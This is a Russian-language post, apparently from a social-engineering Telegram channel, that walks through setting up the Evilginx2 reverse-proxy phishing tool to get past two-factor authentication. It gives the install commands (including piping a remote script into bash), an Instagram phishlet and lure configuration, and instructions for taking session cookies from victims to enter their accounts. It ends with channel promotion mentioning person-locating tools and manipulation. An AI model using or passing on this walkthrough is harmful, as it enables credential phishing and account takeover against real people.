Фишинг 2FA.
Social Engineering![](/file/6cc8fbffa749547a9cbae.png)
Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично оригинальной, так как по факту это оригинальная страница и есть. Весь код страницы проксируется через nginx, а прокси подменяет все урлы которые есть в теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают корректно, но редиректят на наш сервер.
Первая версия Evilginx была тоже хороша https://github.com/kgretzky/evilginx, но недостатками была сложность установки и конфигурирования, в результате сейчас проект не поддерживается, и многие конфиги не работают, хотя только на первой версии проекта у меня получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный пост про это.
Прелесть второй версии в том, что все работает в докере, что убирает весь геморрой с конфигурированием, и оставляет нам править простецкий yml файлик
Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:
![](/file/1c80ac28543715b74bda4.png)
И так в посте покажу процес установки и разворачивания:
- Покупаем домен и vps
- Настраиваем ns запись на свою VPS (Может занят до суток)
Установка:
Код:
curl https://get.docker.com/ | bash git clone https://github.com/kgretzky/evilginx2 cd evilginx2 docker build . -t evilginx2 docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
![](/file/73cf8748b7d83b07ff64d.png)
Интерактивный шелл который открылся умеет help. С этого момента можно выбрать любой из сервисов, я покажу на примере instagram:
Код:
config domain example.org # подставить свое config ip 10.0.0.23 # подставить свое phishlets hostname instagram insta2.exmaple.org # подставить свое phishlets enable instagram lures create instagram lures get-url 0 https://www.insta2.example.org/oEnQzLHb
![](/file/332ee77f5a946a0a64eb8.png)
По ссылке для фишинга(https://www.insta2.example.org/oEnQzLHb) полная копия оригинального instagram с возможностью авторизации 2fa.
Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки, и воспользоваться ими для входа в сервис.
![](/file/143b52f9f353d9bce4ddc.png)
![](/file/1b10174b5315836100cc3.png)
Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)
S.E.Book - Литература социального инженера.
@Social_Engineering_bot - Бот обратной связи.
![](/file/1b10174b5315836100cc3.png)
- Шифруем диск с помощью luksipc без потери данных.
- Получение номера телефона, зная адрес электронной почты.
- Seeker. Узнаем местоположение человека.
- SpiderFoot.
- 15 документальных фильмов о хакерах и хакерстве.
- 9 способов развить Социальный Интеллект и научиться манипулировать людьми.
![](/file/1b10174b5315836100cc3.png)